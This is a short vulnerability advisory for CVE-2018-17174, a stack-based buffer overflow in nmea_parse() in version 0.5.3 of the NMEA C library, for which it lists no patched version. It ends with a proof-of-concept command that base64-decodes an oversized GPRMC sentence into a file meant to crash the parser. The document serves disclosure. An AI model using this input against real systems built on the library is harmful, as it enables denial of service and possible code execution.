- Vendor URL: http://nmea.sourceforge.net/
- Confirmed Affected Versions: 0.5.3
- Confirmed Patched Versions: N/A
open source and free library in 'C' programming language for work with NMEA protocol. Small and easy to use. The library build on different compilers under different platforms (see below). The code was tested in real projects.
SUMMARY AND IMPACT
a stack-based buffer overflow was discovered in NMEA library. In nmea_parse() in parser.c , It allow an attacker to trigger denial of service (even arbitrary code execution in specified context) on a product using this library via malformed data.
CVE-2018-17174 has been assigned to this.
PROOF OF CONCEPT
echo JEdQUk1DLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAyMTM2NDAuODg2LFYsLCwsLCwsMDEwMjA3LCwsTio0RA0KCg== | base64 -d > PoC